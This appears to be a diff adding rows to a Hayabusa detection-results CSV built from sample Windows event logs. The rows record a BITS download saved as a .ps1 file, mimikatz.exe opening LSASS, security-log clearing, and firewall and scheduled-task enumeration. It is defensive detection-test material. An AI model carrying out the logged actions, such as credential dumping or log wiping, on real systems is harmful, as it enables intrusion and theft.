+2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ GUID=""{8FA5064B-8479-4c5c-86EA-0D311FE48875}"" Author=""Microsoft Corporation"" CompanyName=""Microsoft Corporation"" Copyright=""© Microsoft Corporation. All rights reserved."" ModuleVersion=""1.0.0.0"" PowerShellVersion=""2.0"" CLRVersion=""2.0"" NestedModules=""Microsoft.BackgroundIntelligentTransfer.Management"" FormatsToProcess=""BitsTransfer.Format.ps1xml"" RequiredAssemblies=Join-Path $psScriptRoot ""Microsoft.BackgroundIntelligentTransfer.Management.Interop.dll"" CmdletsToExport=""Add-BitsFile"",""Complete-BitsTransfer"",""Get-BitsTransfer"",""Remove-BitsTransfer"",""Resume-BitsTransfer"",""Set-BitsTransfer"",""Start-BitsTransfer"",""Suspend-BitsTransfer"" }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:36.742 +09:00,FS03.offsec.lan,4104,medium,Exec,Windows PowerShell Web Request,,../hayabusa-rules/sigma/powershell/powershell_script/posh_ps_web_request.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Start-BitsTransfer): ""Start-BitsTransfer"" ParameterBinding(Start-BitsTransfer): name=""Priority""; value=""foreground"" ParameterBinding(Start-BitsTransfer): name=""Source""; value=""https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1197/T1197.md"" ParameterBinding(Start-BitsTransfer): name=""Destination""; value=""C:\Users\bits.ps1""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"[System.Diagnostics.DebuggerHidden()] param() $foundSuggestion = $false if($lastError -and ($lastError.Exception -is ""System.Management.Automation.CommandNotFoundException"")) { $escapedCommand = [System.Management.Automation.WildcardPattern]::Escape($lastError.TargetObject) $foundSuggestion = @(Get-Command ($ExecutionContext.SessionState.Path.Combine(""."", $escapedCommand)) -ErrorAction Ignore).Count -gt 0 } $foundSuggestion",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"""The command $($lastError.TargetObject) was not found, but does exist in the current location. Windows PowerShell does not load commands from the current location by default. If you trust this command, instead type `"".\$($lastError.TargetObject)`"". See `""get-help about_Command_Precedence`"" for more details.""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:37.084 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Out-Default): ""Out-Default""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:38:37.100 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,prompt,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID800-4103-4104-PowerShell BITS job started.evtx
+2021-10-22 02:53:42.530 +09:00,FS03.offsec.lan,59,info,Evas | Persis,Bits Job Created,Job Title: BITS Transfer | URL: https://releases.ubuntu.com/20.04.3/ubuntu-20.04.3-desktop-amd64.iso,../hayabusa-rules/hayabusa/default/events/BitsClient_Operational/59_BitsJobCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1197-BITS jobs/ID60-High volume file downloaded with BITS.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: mimikatz.exe | Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | User: OFFSEC\admmig | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x1f4c65f | PID: 2032 | PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Hash: SHA1=D241DF7B9D2EC0B8194751CD5CE153E27CC40FA4,MD5=A3CB3B02A683275F7E0A0F8A9A5C9E07,SHA256=31EB1DE7E840A342FD468E558E5AB627BCB4C542A8FE01AEC4D5BA01D539A0FC,IMPHASH=DBDEA7B557F0E6B5D9E18ABE9CE5220A",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:12.867 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,,Process Created_Sysmon Alert,"technique_id=T1059,technique_name=Command-Line Interface | Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: mimikatz.exe | LID: 0x2e6dea4 | PID: 5040 | PGUID: 7CF65FC7-D04B-6171-1303-000000001200 | Hash: SHA1=7C3D7281E1151FE4127923F4B4C3CD36438E1A12,MD5=F5AE03DE0AD60F5B17B82F2CD68402FE,SHA256=6F88FB88FFB0F1D5465C2826E5B4F523598B1B8378377C8378FFEBC171BAD18B,IMPHASH=77AED1ADAF24B344F08C8AD1432908C3",../hayabusa-rules/hayabusa/sysmon/alerts/1_ProcessCreated_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.120 +09:00,FS03.offsec.lan,1,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,low,,Process Access,Src Process: C:\TOOLS\Mimikatzx64\mimikatz.exe | Tgt Process: C:\Windows\system32\lsass.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1010 | Src PID: 2032 | Src PGUID: 7CF65FC7-D02C-6171-1203-000000001200 | Tgt PID: 512 | Tgt PGUID: 7CF65FC7-6649-6165-0B00-000000001200,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,CredAccess,Suspicious GrantedAccess Flags on LSASS Access,,../hayabusa-rules/sigma/process_access/win_susp_proc_access_lsass.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 05:40:43.136 +09:00,FS03.offsec.lan,10,high,ResDev,Relevant Anti-Virus Event,,../hayabusa-rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID10-Mimikatz LSASS process dump.evtx
+2021-10-22 22:39:49.619 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 22:39:50.927 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh advfirewall show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x1328 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 22:39:55.502 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: netsh a show allprofiles | Path: C:\Windows\System32\netsh.exe | PID: 0x10c4 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Firewall configuration enumerated (command).evtx
+2021-10-22 23:02:11.218 +09:00,FS03.offsec.lan,1102,high,Evas,Security Log Cleared,User: admmig,../hayabusa-rules/hayabusa/default/alerts/Security/1102_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-22 23:02:11.902 +09:00,FS03.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /query /xml | Path: C:\Windows\System32\schtasks.exe | PID: 0xce0 | User: admmig | LID: 0x1f4c65f,../hayabusa-rules/hayabusa/non-default/alerts/Security/4688_ProcessCreated_PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-22 23:02:15.177 +09:00,FS03.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Sysmon\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3198a75,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID4688-Scheduled task configuration enumeration.evtx
+2021-10-24 06:50:11.666 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
+2021-10-24 06:51:57.212 +09:00,FS03.offsec.lan,4625,low,,Logon Failure - Unknown Reason,User: - | Type: 10 | Computer: - | IP Addr: 10.23.23.9 | AuthPackage: Negotiate,../hayabusa-rules/hayabusa/default/alerts/Security/4625_LogonFailure_UnknownError.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0001-Initial access/T1078-Valid accounts/ID4625-failed login with denied access due to account restriction.evtx
+2021-10-25 16:23:05.426 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,Get-NetFirewallProfile,../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.457 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"@{ ModuleVersion = '2.0.0.0' FormatsToProcess = 'NetSecurity.formats.ps1xml' TypesToProcess = 'NetSecurity.types.ps1xml' NestedModules = @( ""Microsoft.Windows.Firewall.Commands.dll"", ""NetFirewallRule.cmdletDefinition.cdxml"", ""NetIPsecRule.cmdletDefinition.cdxml"", ""NetIPsecMainModeRule.cmdletDefinition.cdxml"", ""NetFirewallAddressFilter.cmdletDefinition.cdxml"", ""NetFirewallApplicationFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceFilter.cmdletDefinition.cdxml"", ""NetFirewallInterfaceTypeFilter.cmdletDefinition.cdxml"", ""NetFirewallSecurityFilter.cmdletDefinition.cdxml"", ""NetFirewallPortFilter.cmdletDefinition.cdxml"", ""NetFirewallServiceFilter.cmdletDefinition.cdxml"", ""NetIPsecPhase1AuthSet.cmdletDefinition.cdxml"", ""NetIPsecPhase2AuthSet.cmdletDefinition.cdxml"", ""NetIPsecMainModeCryptoSet.cmdletDefinition.cdxml"", ""NetIPsecQuickModeCryptoSet.cmdletDefinition.cdxml"", ""NetFirewallProfile.cmdletDefinition.cdxml"", ""NetIPsecPolicyChange.cmdletDefinition.cdxml"", ""NetIPsecDospSetting.cmdletDefinition.cdxml"", ""NetIPsecIdentity.cmdletDefinition.cdxml"", ""NetIPsecMainModeSA.cmdletDefinition.cdxml"", ""NetIPsecQuickModeSA.cmdletDefinition.cdxml"", ""NetFirewallSetting.cmdletDefinition.cdxml"", ""NetGPO.cmdletDefinition.cdxml"" ) GUID = '{4B26FF51-7AEE-4731-9CF7-508B82532CBF}' Author = 'Microsoft Corporation' CompanyName = 'Microsoft Corporation' PowerShellVersion = '3.0' ClrVersion = '4.0' Copyright = '© Microsoft Corporation. All rights reserved.' HelpInfoUri = ""http://go.microsoft.com/fwlink/?linkid=285764"" FunctionsToExport = @( ""Copy-NetFirewallRule"", ""Copy-NetIPsecMainModeCryptoSet"", ""Copy-NetIPsecMainModeRule"", ""Copy-NetIPsecPhase1AuthSet"", ""Copy-NetIPsecPhase2AuthSet"", ""Copy-NetIPsecQuickModeCryptoSet"", ""Copy-NetIPsecRule"", ""Disable-NetFirewallRule"", ""Disable-NetIPsecMainModeRule"", ""Disable-NetIPsecRule"", ""Enable-NetFirewallRule"", ""Enable-NetIPsecMainModeRule"", ""Enable-NetIPsecRule"", ""Get-NetFirewallAddressFilter"", ""Get-NetFirewallApplicationFilter"", ""Get-NetFirewallInterfaceFilter"", ""Get-NetFirewallInterfaceTypeFilter"", ""Get-NetFirewallPortFilter"", ""Get-NetFirewallProfile"", ""Get-NetFirewallRule"", ""Get-NetFirewallSecurityFilter"", ""Get-NetFirewallServiceFilter"", ""Get-NetFirewallSetting"", ""Get-NetIPsecDospSetting"", ""Get-NetIPsecMainModeCryptoSet"", ""Get-NetIPsecMainModeRule"", ""Get-NetIPsecMainModeSA"", ""Get-NetIPsecPhase1AuthSet"", ""Get-NetIPsecPhase2AuthSet"", ""Get-NetIPsecQuickModeCryptoSet"", ""Get-NetIPsecQuickModeSA"", ""Get-NetIPsecRule"", ""New-NetFirewallRule"", ""New-NetIPsecDospSetting"", ""New-NetIPsecMainModeCryptoSet"", ""New-NetIPsecMainModeRule"", ""New-NetIPsecPhase1AuthSet"", ""New-NetIPsecPhase2AuthSet"", ""New-NetIPsecQuickModeCryptoSet"", ""New-NetIPsecRule"", ""Open-NetGPO"", ""Remove-NetFirewallRule"", ""Remove-NetIPsecDospSetting"", ""Remove-NetIPsecMainModeCryptoSet"", ""Remove-NetIPsecMainModeRule"", ""Remove-NetIPsecMainModeSA"", ""Remove-NetIPsecPhase1AuthSet"", ""Remove-NetIPsecPhase2AuthSet"", ""Remove-NetIPsecQuickModeCryptoSet"", ""Remove-NetIPsecQuickModeSA"", ""Remove-NetIPsecRule"", ""Rename-NetFirewallRule"", ""Rename-NetIPsecMainModeCryptoSet"", ""Rename-NetIPsecMainModeRule"", ""Rename-NetIPsecPhase1AuthSet"", ""Rename-NetIPsecPhase2AuthSet"", ""Rename-NetIPsecQuickModeCryptoSet"", ""Rename-NetIPsecRule"", ""Save-NetGPO"", ""Find-NetIPsecRule"", ""Set-NetFirewallAddressFilter"", ""Set-NetFirewallApplicationFilter"", ""Set-NetFirewallInterfaceFilter"", ""Set-NetFirewallInterfaceTypeFilter"", ""Set-NetFirewallPortFilter"", ""Set-NetFirewallProfile"", ""Set-NetFirewallRule"", ""Set-NetFirewallSecurityFilter"", ""Set-NetFirewallServiceFilter"", ""Set-NetFirewallSetting"", ""Set-NetIPsecDospSetting"", ""Set-NetIPsecMainModeCryptoSet"", ""Set-NetIPsecMainModeRule"", ""Set-NetIPsecPhase1AuthSet"", ""Set-NetIPsecPhase2AuthSet"", ""Set-NetIPsecQuickModeCryptoSet"", ""Set-NetIPsecRule"", ""Show-NetFirewallRule"", ""Show-NetIPsecRule"", ""Sync-NetIPsecRule"", ""Update-NetIPsecRule"" ) CmdletsToExport = @( ""Get-DAPolicyChange"", ""New-NetIPsecAuthProposal"", ""New-NetIPsecMainModeCryptoProposal"", ""New-NetIPsecQuickModeCryptoProposal"" ) AliasesToExport = @( ) }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"<?xml version='1.0' encoding='utf-8'?> <PowerShellMetadata xmlns=""http://schemas.microsoft.com/cmdlets-over-objects/2009/11""> <Class ClassName=""root/standardcimv2/MSFT_NetFirewallRule"" ClassVersion=""1.0.0""> <Version>1.0.0.0</Version> <DefaultNoun>NetFirewallRule</DefaultNoun> <InstanceCmdlets> <GetCmdletParameters DefaultCmdletParameterSet=""GetAll""> <QueryableProperties> <Property PropertyName=""InstanceID""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Name"" CmdletParameterSets=""ByName"" IsMandatory=""true"" Position=""0"" Aliases=""ID""/> </RegularQuery> </Property> <Property PropertyName=""DisplayName""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByDisplayName"" IsMandatory=""true""/> </RegularQuery> </Property> <Property PropertyName=""Description""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""DisplayGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""RuleGroup""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata PSName=""Group"" CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Direction""> <Type PSType=""NetSecurity.Direction""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Action""> <Type PSType=""NetSecurity.Action""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""EdgeTraversalPolicy""> <Type PSType=""NetSecurity.EdgeTraversal""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""LooseSourceMapping""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery"" Aliases=""LSM""/> </RegularQuery> </Property> <Property PropertyName=""LocalOnlyMapping""> <Type PSType=""boolean""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Owner""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PrimaryStatus""> <Type PSType=""NetSecurity.PrimaryStatus""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""Status""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSource""> <Type PSType=""string""/> <RegularQuery AllowGlobbing=""true""> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> <Property PropertyName=""PolicyStoreSourceType""> <Type PSType=""NetSecurity.PolicyStoreType""/> <RegularQuery> <CmdletParameterMetadata CmdletParameterSets=""ByQuery""/> </RegularQuery> </Property> </QueryableProperties> <QueryableAssociations> <Association Association=""MSFT_NetFirewallRuleFilterByAddress"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallAddressFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallAddressFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetFirewallRuleFilterByApplication"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallApplicationFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallApplicationFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetFirewallRuleFilterByInterface"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallInterfaceFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallInterfaceFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetFirewallRuleFilterByInterfaceType"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallInterfaceTypeFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallInterfaceTypeFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetFirewallRuleFilterByProtocolPort"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallPortFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallPortFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetFirewallRuleFilterBySecurity"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallSecurityFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallSecurityFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetFirewallRuleFilterByService"" ResultRole=""GroupComponent"" SourceRole=""PartComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallServiceFilter"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallServiceFilter""/> </AssociatedInstance> </Association> <Association Association=""MSFT_NetFirewallRuleInProfile"" ResultRole=""PartComponent"" SourceRole=""GroupComponent""> <AssociatedInstance> <Type PSType=""Microsoft.Management.Infrastructure.CimInstance"" ETSType=""Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile""/> <CmdletParameterMetadata PSName=""AssociatedNetFirewallProfile"" IsMandatory=""true"" ValueFromPipeline=""true"" CmdletParameterSets=""ByAssociatedNetFirewallProfile""/> </AssociatedInstance> </Association> </QueryableAssociations> <QueryOptions> <Option OptionName=""All""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata CmdletParameterSets=""GetAll""/> </Option> <Option OptionName=""PolicyStore""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""GPOSession""> <Type PSType=""string""/> <CmdletParameterMetadata/> </Option> <Option OptionName=""TracePolicyStore""> <Type PSType=""System.Management.Automation.SwitchParameter""/> <CmdletParameterMetadata/> </Option> </QueryOptions> </GetCmdletParameters> <Cmdlet> <CmdletMetadata Verb=""Set"" ConfirmImpact=""Medium""/> <Method MethodName=""cim:ModifyInstance""> <Parameters> <Parameter ParameterName=""ElementName""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""NewDisplayName""/> </Parameter> <Parameter ParameterName=""Description""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Description""/> </Parameter> <Parameter ParameterName=""Enabled""> <Type PSType=""NetSecurity.Enabled""/> <CmdletParameterMetadata PSName=""Enabled""/> </Parameter> <Parameter ParameterName=""Profiles""> <Type PSType=""NetSecurity.Profile""/> <CmdletParameterMetadata PSName=""Profile""/>",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.536 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"</Parameter> <Parameter ParameterName=""Platforms""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""Platform""/> </Parameter> <Parameter ParameterName=""Direction""> <Type PSType=""NetSecurity.Direction""/> <CmdletParameterMetadata PSName=""Direction""/> </Parameter> <Parameter ParameterName=""Action""> <Type PSType=""NetSecurity.Action""/> <CmdletParameterMetadata PSName=""Action""/> </Parameter> <Parameter ParameterName=""EdgeTraversalPolicy""> <Type PSType=""NetSecurity.EdgeTraversal""/> <CmdletParameterMetadata PSName=""EdgeTraversalPolicy""/> </Parameter> <Parameter ParameterName=""LooseSourceMapping""> <Type PSType=""boolean""/> <CmdletParameterMetadata Aliases=""LSM"" PSName=""LooseSourceMapping""/> </Parameter> <Parameter ParameterName=""LocalOnlyMapping""> <Type PSType=""boolean""/> <CmdletParameterMetadata PSName=""LocalOnlyMapping""/> </Parameter> <Parameter ParameterName=""Owner""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Owner""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemoteAddress""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemoteAddress""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Protocol""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Protocol""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:LocalPort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""LocalPort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:RemotePort""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""RemotePort""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:IcmpType""> <Type PSType=""string[]""/> <CmdletParameterMetadata PSName=""IcmpType""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:DynamicTransport""> <Type PSType=""NetSecurity.DynamicTransport""/> <CmdletParameterMetadata Aliases=""DynamicTransport"" PSName=""DynamicTarget""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Program""> <Type PSType=""string""/> <CmdletParameterMetadata PSName=""Program""/> </Parameter> <Parameter ParameterName=""cim:OperationOption:Package""> <Type PSType=""string""/> 